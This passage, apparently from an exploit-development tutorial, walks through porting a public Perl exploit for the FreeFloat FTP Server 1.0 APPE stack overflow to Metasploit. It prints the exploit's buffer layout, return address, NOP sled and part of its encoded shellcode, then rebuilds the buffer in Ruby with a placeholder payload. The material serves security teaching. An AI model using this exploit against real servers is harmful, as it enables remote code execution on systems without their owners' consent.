Porting a Perl-based exploit
Let's start by understanding the structure of a Perl-based exploit. In the following example, we will be porting an exploit for FreeFloat FTP Server Version 1.0, which triggers a stack-based buffer overflow in the server through an overlong argument to the APPE command. Let's see the publicly available version of this exploit in Perl:
use strict;
use Socket;

# FTP command whose argument overflows the buffer
my $command = "APPE ";
# 246 bytes of filler to reach the saved return address
my $buffstuff = "\x90" x 246;
# return address, pack('V') = 32-bit unsigned little-endian
my $offset_eip = pack('V',0x71AB9372);
# 50-byte NOP sled in front of the encoded payload
my $payloadencoded="\x90" x 50;
# encoded payload (shellcode)
$payloadencoded=$payloadencoded.
"\xba\x3f\xd4\x83\xe9\xdb\xcc\xd9\x74\x24\xf4\x5f\x2b\xc9" .
"\xb1\x56\x31\x57\x13\x83\xc7\x04\x03\x57\x30\x36\x76\x15" .
"\xa6\x3f\x79\xe6\x36\x20\xf3\x03\x07\x72\x67\x47\x35\x42" .
"\xe3\x05\xb5\x29\xa1\xbd\x4e\x5f\x6e\xb1\xe7\xea\x48\xfc" .
"\xf8\xda\x54\x52\x3a\x7c\x29\xa9\x6e\x5e\x10\x62\x63\x9f" .
"\x55\x9f\x8b\xcd\x0e\xeb\x39\xe2\x3b\xa9\x81\x03\xec\xa5" .
"\xb9\x7b\x89\x7a\x4d\x36\x90\xaa\xfd\x4d\xda\x52\x76\x09" .
"\xfb\x63\x5b\x49\xc7\x2a\xd0\xba\xb3\xac\x30\xf3\x3c\x9f" .
"\x7c\x58\x03...
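Before wrapping this in a Metasploit module, it helps to translate the buffer layout into plain Ruby and check the offsets, since the Perl pack('V') and Ruby Array#pack('V') both produce a 32-bit unsigned little-endian value. The following is an added example, not code from the book or from the original FreeFloat exploit author; it reproduces only the layout visible in the Perl source above ("APPE " + 246 filler bytes + 4-byte return address + 50 NOPs + payload). The shellcode is a stand-in string (assumption, because the book's encoded payload is truncated), and the trailing CRLF comes from the FTP protocol rather than from the visible Perl:

```ruby
# Added example (not from the book or the exploit author): the FreeFloat FTP
# buffer layout from the Perl exploit, rebuilt in plain Ruby so the pack()
# translation and the offsets can be verified before porting to Metasploit.

FTP_COMMAND  = "APPE "          # Perl: my $command = "APPE ";
FILLER_LEN   = 246              # Perl: "\x90" x 246
RET_ADDR     = 0x71AB9372       # Perl: pack('V',0x71AB9372)
NOP_SLED_LEN = 50               # Perl: "\x90" x 50
# Assumption: stand-in for the real encoded shellcode, which is truncated above.
STAND_IN_PAYLOAD = "PAYLOAD_PLACEHOLDER".b

# Perl pack('V', addr) and Ruby [addr].pack('V') are equivalent:
# both emit the address as 4 little-endian bytes.
def pack_ret(addr)
  [addr].pack('V')
end

# Build the overflow line exactly as the Perl exploit assembles it.
# .b forces binary (ASCII-8BIT) strings so "\x90" bytes concatenate cleanly.
def build_buffer(payload = STAND_IN_PAYLOAD)
  buf  = FTP_COMMAND.b
  buf << ("\x90" * FILLER_LEN).b      # filler up to the saved return address
  buf << pack_ret(RET_ADDR)           # overwrites saved EIP
  buf << ("\x90" * NOP_SLED_LEN).b    # NOP sled execution slides down
  buf << payload.b                    # encoded shellcode goes here
  buf << "\r\n".b                     # FTP commands are CRLF-terminated (RFC 959)
  buf
end

# Offset, from the start of the sent line, at which the return address sits.
def eip_offset
  FTP_COMMAND.bytesize + FILLER_LEN
end

# The 4 bytes occupying the return-address slot, in memory order.
def ret_bytes_in(buf)
  buf.byteslice(eip_offset, 4)
end

if __FILE__ == $0
  buf = build_buffer
  puts "total length: #{buf.bytesize} bytes"
  puts "EIP offset:   #{eip_offset}"
  puts "ret bytes:    #{ret_bytes_in(buf).unpack1('H*')}"
end
```

Note that the offset counts the five bytes of "APPE " as well as the 246 filler bytes; when the buffer is later emitted from a Metasploit module, the command prefix is still part of what the server copies, so it must be included in any pattern_offset style calculation as well.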